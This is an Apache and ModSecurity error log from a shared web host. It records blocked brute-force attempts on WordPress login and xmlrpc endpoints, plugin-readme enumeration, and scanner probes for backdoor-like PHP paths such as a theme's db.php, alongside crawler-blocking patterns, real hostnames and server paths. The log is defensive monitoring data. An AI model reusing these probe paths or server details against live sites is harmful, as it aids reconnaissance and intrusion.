[Tue May 26 18:59:18.258418 2026] [security2:error] [pid 1045635:tid 1045788] [client 2.58.56.163:54311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWgLhhDcQXYr7SS5sUIZQAAABc"]
[Tue May 26 18:59:18.258547 2026] [security2:error] [pid 1045635:tid 1045788] [client 2.58.56.163:54311] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWgLhhDcQXYr7SS5sUIZQAAABc"]
[Tue May 26 18:59:19.114489 2026] [security2:error] [pid 1045635:tid 1045775] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWgLxhDcQXYr7SS5sUIgAAAAAo"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 18:59:19.379182 2026] [security2:error] [pid 1045635:tid 1045884] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgLhhDcQXYr7SS5sUIfAAAAHc"]
[Tue May 26 18:59:22.110217 2026] [security2:error] [pid 1045635:tid 1045879] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgMRhDcQXYr7SS5sUIwgAAAHI"]
[Tue May 26 18:59:22.582680 2026] [security2:error] [pid 1045635:tid 1045689] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgMhhDcQXYr7SS5sUI0wAARTU"]
[Tue May 26 18:59:22.582896 2026] [security2:error] [pid 1045635:tid 1045834] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgMhhDcQXYr7SS5sUI0wAARTU"]
[Tue May 26 18:59:23.066660 2026] [security2:error] [pid 1045635:tid 1045815] [client 209.141.51.180:16588] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "theafterglow-centre.com"] [uri "/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt"] [unique_id "ahWgMxhDcQXYr7SS5sUI5QAAADI"]
[Tue May 26 18:59:23.625016 2026] [security2:error] [pid 1045635:tid 1045880] [client 209.141.51.180:16596] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "theafterglow-centre.com"] [uri "/wp-content/plugins/sg-cachepress/readme.txt"] [unique_id "ahWgMxhDcQXYr7SS5sUI-AAAAHM"]
[Tue May 26 18:59:23.827524 2026] [security2:error] [pid 1045635:tid 1045828] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgMxhDcQXYr7SS5sUI8AAAAD8"]
[Tue May 26 18:59:23.875226 2026] [security2:error] [pid 1045635:tid 1045821] [client 85.208.96.200:23854] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWgMxhDcQXYr7SS5sUI_AAAADg"]
[Tue May 26 18:59:23.875370 2026] [security2:error] [pid 1045635:tid 1045821] [client 85.208.96.200:23854] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWgMxhDcQXYr7SS5sUI_AAAADg"]
[Tue May 26 18:59:25.186016 2026] [security2:error] [pid 1045635:tid 1045866] [client 103.240.99.165:49637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWgNBhDcQXYr7SS5sUJFQAAAGU"], referer: https://www.cagmedya.com/?partner_id=2994&partner_device_id=f5726a1e8c23e9289ec01ea455c7055a
[Tue May 26 18:59:26.298177 2026] [security2:error] [pid 1045635:tid 1045828] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgNRhDcQXYr7SS5sUJMgAAAD8"]
[Tue May 26 18:59:27.150344 2026] [security2:error] [pid 1045635:tid 1045717] [remote 54.38.29.86:57780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWgNhhDcQXYr7SS5sUJUgAALlE"]
[Tue May 26 18:59:27.970858 2026] [security2:error] [pid 1045635:tid 1045778] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgNxhDcQXYr7SS5sUJZAAAAA0"]
[Tue May 26 18:59:30.331114 2026] [security2:error] [pid 1045635:tid 1045824] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgORhDcQXYr7SS5sUJrgAAADs"]
[Tue May 26 18:59:31.121009 2026] [security2:error] [pid 1045635:tid 1045741] [remote 46.62.185.67:52440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWgOhhDcQXYr7SS5sUJwgAAB2k"]
[Tue May 26 18:59:33.193963 2026] [security2:error] [pid 1045635:tid 1045749] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgPRhDcQXYr7SS5sUJ_wAALXE"]
[Tue May 26 18:59:33.194118 2026] [security2:error] [pid 1045635:tid 1045810] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgPRhDcQXYr7SS5sUJ_wAALXE"]
[Tue May 26 18:59:33.412951 2026] [security2:error] [pid 1045635:tid 1045842] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgPBhDcQXYr7SS5sUJ_gAAAE0"]
[Tue May 26 18:59:35.522298 2026] [security2:error] [pid 1045635:tid 1045832] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgPxhDcQXYr7SS5sUKLwAAAEM"]
[Tue May 26 18:59:35.559370 2026] [security2:error] [pid 1045635:tid 1045756] [remote 74.7.241.58:37124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWgPxhDcQXYr7SS5sUKPgAAKXg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/ninja-forms
[Tue May 26 18:59:37.673250 2026] [security2:error] [pid 1045635:tid 1045867] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgQRhDcQXYr7SS5sUKbAAAAGY"]
[Tue May 26 18:59:39.266068 2026] [fcgid:warn] [pid 1045635:tid 1045838] (70014)End of file found: [client 199.45.154.147:33272] mod_fcgid: can't get data from http client
[Tue May 26 18:59:39.502978 2026] [security2:error] [pid 1045635:tid 1045807] [client 14.161.160.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgQxhDcQXYr7SS5sUKnAAAACo"]
[Tue May 26 18:59:39.716211 2026] [security2:error] [pid 1045635:tid 1045810] [client 198.90.92.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWgQxhDcQXYr7SS5sUKoQAALXs"]
[Tue May 26 18:59:39.782467 2026] [security2:error] [pid 1045635:tid 1045812] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgQxhDcQXYr7SS5sUKqQAAAC8"]
[Tue May 26 18:59:40.162549 2026] [security2:error] [pid 1045635:tid 1045869] [client 198.90.92.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWgQxhDcQXYr7SS5sUKowAAaA0"]
[Tue May 26 18:59:40.648232 2026] [autoindex:error] [pid 1045635:tid 1045850] [client 199.45.154.147:0] AH01276: Cannot serve directory /home1/moesartc/public_html/drunktales.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:59:41.829361 2026] [security2:error] [pid 1045635:tid 1045831] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgRRhDcQXYr7SS5sUK_AAAAEI"]
[Tue May 26 18:59:42.022083 2026] [security2:error] [pid 1045635:tid 1045870] [client 35.172.225.218:45998] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWgRRhDcQXYr7SS5sULCwAAAGk"], referer: http://ivma.in/
[Tue May 26 18:59:42.697119 2026] [security2:error] [pid 1045635:tid 1045674] [remote 54.38.147.46:50172] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahWgRhhDcQXYr7SS5sULIQAALyY"]
[Tue May 26 18:59:42.697345 2026] [security2:error] [pid 1045635:tid 1045812] [client 54.38.147.46:50172] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahWgRhhDcQXYr7SS5sULIQAALyY"]
[Tue May 26 18:59:43.605364 2026] [security2:error] [pid 1045635:tid 1045868] [client 20.29.64.60:2501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-plain.php"] [unique_id "ahWgRxhDcQXYr7SS5sULOAAAAGc"], referer: www.google.com
[Tue May 26 18:59:43.694209 2026] [security2:error] [pid 1045635:tid 1045878] [client 20.29.64.60:2499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWgRxhDcQXYr7SS5sULPQAAAHE"], referer: www.google.com
[Tue May 26 18:59:44.054021 2026] [security2:error] [pid 1045635:tid 1045681] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgRxhDcQXYr7SS5sULRAAAeS0"]
[Tue May 26 18:59:44.054234 2026] [security2:error] [pid 1045635:tid 1045886] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgRxhDcQXYr7SS5sULRAAAeS0"]
[Tue May 26 18:59:44.186467 2026] [security2:error] [pid 1045635:tid 1045680] [remote 142.44.225.9:38810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWgSBhDcQXYr7SS5sULTAAAFSw"]
[Tue May 26 18:59:44.186714 2026] [security2:error] [pid 1045635:tid 1045786] [client 142.44.225.9:38810] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWgSBhDcQXYr7SS5sULTAAAFSw"]
[Tue May 26 18:59:44.573665 2026] [security2:error] [pid 1045635:tid 1045682] [remote 162.240.102.228:47284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgSBhDcQXYr7SS5sULUAAAMS4"]
[Tue May 26 18:59:44.639793 2026] [proxy:error] [pid 1045635:tid 1045851] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:44.639871 2026] [proxy_http:error] [pid 1045635:tid 1045851] [client 178.128.226.230:44316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:44.640482 2026] [proxy:error] [pid 1045635:tid 1045851] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:44.640518 2026] [proxy_http:error] [pid 1045635:tid 1045851] [client 178.128.226.230:44316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:44.732756 2026] [security2:error] [pid 1045635:tid 1045777] [client 20.29.64.60:2513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/umgdjfoi.php"] [unique_id "ahWgSBhDcQXYr7SS5sULWwAAAAw"], referer: www.google.com
[Tue May 26 18:59:44.825975 2026] [proxy:error] [pid 1045635:tid 1045776] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:44.826037 2026] [proxy_http:error] [pid 1045635:tid 1045776] [client 178.128.226.230:44322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.virgence.com/
[Tue May 26 18:59:44.826680 2026] [proxy:error] [pid 1045635:tid 1045776] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:44.826716 2026] [proxy_http:error] [pid 1045635:tid 1045776] [client 178.128.226.230:44322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.virgence.com/
[Tue May 26 18:59:44.921562 2026] [security2:error] [pid 1045635:tid 1045862] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgSBhDcQXYr7SS5sULUwAAAGE"]
[Tue May 26 18:59:45.205486 2026] [core:error] [pid 1045635:tid 1045841] [client 178.128.226.230:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:59:45.205514 2026] [core:error] [pid 1045635:tid 1045841] [client 178.128.226.230:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:59:47.342757 2026] [security2:error] [pid 1045635:tid 1045832] [client 20.29.64.60:2514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWgSxhDcQXYr7SS5sULoQAAAEM"], referer: www.google.com
[Tue May 26 18:59:47.370022 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.29.64.60:2504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-plain.php"] [unique_id "ahWgSxhDcQXYr7SS5sULowAAADM"], referer: www.google.com
[Tue May 26 18:59:47.489289 2026] [core:error] [pid 1045635:tid 1045818] [client 178.128.226.230:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcalendars.virgence.com/
[Tue May 26 18:59:47.489311 2026] [core:error] [pid 1045635:tid 1045818] [client 178.128.226.230:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcalendars.virgence.com/
[Tue May 26 18:59:47.872214 2026] [security2:error] [pid 1045635:tid 1045875] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgSxhDcQXYr7SS5sULqwAAAG4"]
[Tue May 26 18:59:48.037808 2026] [security2:error] [pid 1045635:tid 1045768] [client 20.29.64.60:2521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/dpezfqwh.php"] [unique_id "ahWgTBhDcQXYr7SS5sULyQAAAAM"], referer: www.google.com
[Tue May 26 18:59:49.458300 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgTRhDcQXYr7SS5sUL4AAAAG0"]
[Tue May 26 18:59:49.812594 2026] [security2:error] [pid 1045635:tid 1045684] [remote 72.167.150.128:55312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgTRhDcQXYr7SS5sUL7AAAJDA"]
[Tue May 26 18:59:50.112259 2026] [security2:error] [pid 1045635:tid 1045695] [remote 72.167.150.128:55312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgThhDcQXYr7SS5sUL-gAAFTs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:59:52.173345 2026] [core:crit] [pid 1045635:tid 1045886] (13)Permission denied: [client 52.167.144.160:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:59:52.655577 2026] [security2:error] [pid 1045635:tid 1045888] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgUBhDcQXYr7SS5sUMPAAAAHs"]
[Tue May 26 18:59:53.992760 2026] [security2:error] [pid 1045635:tid 1045783] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgURhDcQXYr7SS5sUMZAAAABI"]
[Tue May 26 18:59:54.455039 2026] [security2:error] [pid 1045635:tid 1045734] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgUhhDcQXYr7SS5sUMfQAAAGI"]
[Tue May 26 18:59:54.455208 2026] [security2:error] [pid 1045635:tid 1045765] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgUhhDcQXYr7SS5sUMfQAAAGI"]
[Tue May 26 18:59:54.888407 2026] [security2:error] [pid 1045635:tid 1045838] [client 103.240.99.165:52347] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWgUhhDcQXYr7SS5sUMgQAAAEk"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 18:59:56.313686 2026] [security2:error] [pid 1045635:tid 1045804] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgUxhDcQXYr7SS5sUMnAAAACc"]
[Tue May 26 18:59:58.363490 2026] [security2:error] [pid 1045635:tid 1045867] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgVRhDcQXYr7SS5sUM0wAAAGY"]
